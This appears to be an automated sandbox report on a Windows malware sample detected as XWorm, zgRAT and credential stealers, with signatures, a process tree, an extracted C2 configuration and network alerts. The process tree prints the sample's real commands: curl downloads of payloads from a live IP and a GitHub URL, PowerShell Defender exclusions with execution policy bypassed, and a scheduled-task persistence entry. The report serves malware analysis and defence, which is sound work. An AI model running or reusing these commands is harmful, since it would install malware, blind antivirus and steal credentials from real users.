Windows Analysis Report
ZOL2mIYAUH.exe
Overview
General Information
Sample name: | ZOL2mIYAUH.exe (renamed because the original name is a hash value) |
Original sample name: | 789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6.exe |
Analysis ID: | 1561594 |
MD5: | 12395d08dc0bfe12e63605328ddd982f |
SHA1: | 51ceb544e3900fb85fe7aada564d081219464d1d |
SHA256: | 789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6 |
Tags: | exe, user-Chainskilabs |
Infos: | |
Detection
Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected PureLog Stealer
Yara detected XWorm
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
- System is w10x64
- ZOL2mIYAUH.exe (PID: 6028 cmdline: "C:\Users\user\Desktop\ZOL2mIYAUH.exe" MD5: 12395D08DC0BFE12E63605328DDD982F)
- conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7300 cmdline: "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7540 cmdline: "cmd.exe" /c mkdir C:\Users\gbcd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7612 cmdline: "curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7712 cmdline: "curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7848 cmdline: "curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7944 cmdline: "curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
- conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- fff.scr (PID: 8024 cmdline: "C:\Users\gbcd\fff.scr" MD5: 81720AF225C9B2E5C8D7B81A7581CF5D)
- qqq.scr (PID: 3452 cmdline: "C:\Users\gbcd\qqq.scr" MD5: 33300ACB6FB3C7EFFAE29A3EB133BE2E)
- powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- schtasks.exe (PID: 4484 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr" MD5: 48C2FE20575769DE916F48EF0676A965)
- conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- winnotify.scr (PID: 5920 cmdline: "C:\Users\Public\winnotify.scr" /S MD5: 33300ACB6FB3C7EFFAE29A3EB133BE2E)
- winnotify.scr (PID: 7980 cmdline: "C:\Users\Public\winnotify.scr" /S MD5: 33300ACB6FB3C7EFFAE29A3EB133BE2E)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with a wide range of capabilities, ranging from RAT to ransomware. | No Attribution | | |
zgRAT | zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT also has an infostealer component that targets browser information and crypto wallets. It usually spreads via USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and the like. | No Attribution | | |

Extracted malware configuration:

```json
{"C2 url": ["79.110.49.246"], "Port": 2331, "Aes key": "<e4efraq2sdsfvrf>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
```
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | | |
JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | | |
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | | |
JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | | |
JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | | |

(27 entries in total; first 5 shown)

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | | |
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | | |
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | | |
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | | |
MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen | | |

(7 entries in total; first 5 shown)
System Summary (Sigma rule matches) |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
Source: | Author: frack113 |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: frack113 |
Source: | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:10:39.044988+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:10:50.432999+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:10:53.983309+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:02.062613+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:13.490207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:23.968499+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:24.989256+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:36.364211+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:47.805214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:53.987648+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:11:59.162483+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:10.625544+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:22.198975+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:23.978371+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:33.747164+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:44.974645+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:53.980651+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:12:56.372835+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
2024-11-23T21:13:10.429811+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-23T21:10:39.225371+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:10:50.461753+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:11:02.090623+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:11:13.511136+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:11:25.009018+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:11:36.385969+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:11:47.849077+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:11:59.206367+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:12:10.641354+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:12:22.230408+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:12:33.800468+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:12:45.049960+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:12:56.400521+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
2024-11-23T21:13:10.431241+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
AV Detection |
---|
Source: | Avira: |
Source: | Avira URL Cloud: |
Source: | Avira URL Cloud: |
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | Avira: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Compliance |
---|
Source: | Unpacked PE file: |
Source: | Unpacked PE file: |
Source: | Unpacked PE file: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Binary string: |
Source: | Code function: 0_2_00469CD8 |
Source: | Code function: 23_2_00D33CD8 |
Networking |
---|
Source: | Suricata IDS: |
Source: | Suricata IDS: |
Source: | URLs: |
Source: | File source: |
Source: | File source: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |